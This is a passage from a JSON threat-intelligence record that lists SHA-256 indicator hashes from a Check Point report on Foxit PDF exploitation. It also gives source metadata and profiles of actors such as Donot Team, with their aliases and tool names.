Screen)\r\nc943fe1b8e1b17ec379d33a6e5819a5736cb5de13564f86f1d3fba320ccebaa0\r\n(APT-C-35 / DoNot Team APK) 7f5f1586b243f477c484c34fa6243c20b3ecf29700c6c17e23a4daf9360e2d2f\r\n(APT-C-35 / DoNot Team APK) ecb4f5f0ee0cda289056f2f994c061d53cfbc8ac413f2ca4da8864c68f0a23f6\r\n(APT-C-35 / DoNot Team APK) 4a7aeb6f510cf5d038e566a3ccd45e98a46463bb67eb34012c8e64444464b081\r\n(PDF) D5483049DC32D1A57E759839930FE17FE31A5F513D24074710F98EC186F06777\r\n(PDF) 19A8201C6A3063B897D696330C1B60BD97914514D2AE6A6C3C1796BEC236724A\r\n(VBScript) 9A7F4FF5FD0A972EEDA9293727F0EECDD7CE2CFE0A072CDF9D3402EE9C46A48E\r\n(VBScript) D761FE4D58FE68FC95D72871429F0FCE6055389A58F81CF0A19EB905A96E1C38\r\n(VBScript) B3AD75EEF9208D58A904030D44DA22C59CE7BD47ED798B0A14B58330A1390FE8\r\n(VBScript) FC330BB132A345AF05FEB0D275EEEF29C7A439A04223757F33360393CF975CA9\r\n(VBScript) A334A9C1A658F4EBEF7BA336F9A27693030DC444509BD9FA8FDEFE8AAAE3A133\r\n(VBScript) E9BF261A779C1B3A023189BEF509579BAD8B496DCFE5E96C19CF8CC8BEA48A08\r\n(VBScript) EE42CF45FFF12BCC9E9262955470BFED810F3530E651FDDB054456264635D9D2\r\n(VBScript) 1CBF897CCCC22A1E6D6A12766ADF0DCEE4C103539ADD2C10C7906042E19519F4\r\n(DynamicWrapperX)\r\n4EF3A6703ABC6B2B8E2CAC3031C1E5B86FE8B377FDE92737349EE52BD2604379\r\n(ShellCode) A5C9A3518F072982404E68DC6A3DC90EDEBBF292FC1ACA6962B6CCF64F4FE28C\r\n(Remcos) 0ADE87BA165A269FD4C03177226A148904E14BD328BDBB31799D2EAD59D7C2FA\r\nSource: https://research.checkpoint.com/2024/foxit-pdf-flawed-design-exploitation/\r\nhttps://research.checkpoint.com/2024/foxit-pdf-flawed-design-exploitation/\r\nPage 32 of 32\n\nThe file was uploaded Figure 19 on the 27th of April by “ - Bechtelar Libby @bechtelarlibby ”.\nFigure 19- PDF attached on 27th of April 2024\n  Page 18 of 32",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://research.checkpoint.com/2024/foxit-pdf-flawed-design-exploitation/"
	],
	"report_names": [
		"foxit-pdf-flawed-design-exploitation"
	],
	"threat_actors": [
		{
			"id": "2ac63ef4-a7b8-4a30-96ad-b30ccb2073fc",
			"created_at": "2022-10-25T16:07:23.546262Z",
			"updated_at": "2026-04-10T02:00:04.651083Z",
			"deleted_at": null,
			"main_name": "Donot Team",
			"aliases": [
				"APT-C-35",
				"Mint Tempest",
				"Origami Elephant",
				"SectorE02"
			],
			"source_name": "ETDA:Donot Team",
			"tools": [
				"BackConfig",
				"EHDevel",
				"Jaca",
				"yty"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "d90307b6-14a9-4d0b-9156-89e453d6eb13",
			"created_at": "2022-10-25T16:07:23.773944Z",
			"updated_at": "2026-04-10T02:00:04.746188Z",
			"deleted_at": null,
			"main_name": "Lead",
			"aliases": [
				"Casper",
				"TG-3279"
			],
			"source_name": "ETDA:Lead",
			"tools": [
				"Agentemis",
				"BleDoor",
				"Cobalt Strike",
				"CobaltStrike",
				"RbDoor",
				"RibDoor",
				"Winnti",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "f9806b99-e392-46f1-9c13-885e376b239f",
			"created_at": "2023-01-06T13:46:39.431871Z",
			"updated_at": "2026-04-10T02:00:03.325163Z",
			"deleted_at": null,
			"main_name": "Watchdog",
			"aliases": [
				"Thief Libra"
			],
			"source_name": "MISPGALAXY:Watchdog",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "cfdd350b-de30-4d29-bbee-28159f26c8c2",
			"created_at": "2023-01-06T13:46:38.433736Z",
			"updated_at": "2026-04-10T02:00:02.972971Z",
			"deleted_at": null,
			"main_name": "VICEROY TIGER",
			"aliases": [
				"OPERATION HANGOVER",
				"Donot Team",
				"APT-C-35",
				"SectorE02",
				"Orange Kala"
			],
			"source_name": "MISPGALAXY:VICEROY TIGER",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434179,
	"ts_updated_at": 1775791983,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/1fca8044e90d64caed80b8a16fab8749dbc8168e.pdf",
		"text": "https://archive.orkl.eu/1fca8044e90d64caed80b8a16fab8749dbc8168e.txt",
		"img": "https://archive.orkl.eu/1fca8044e90d64caed80b8a16fab8749dbc8168e.jpg"
	}
}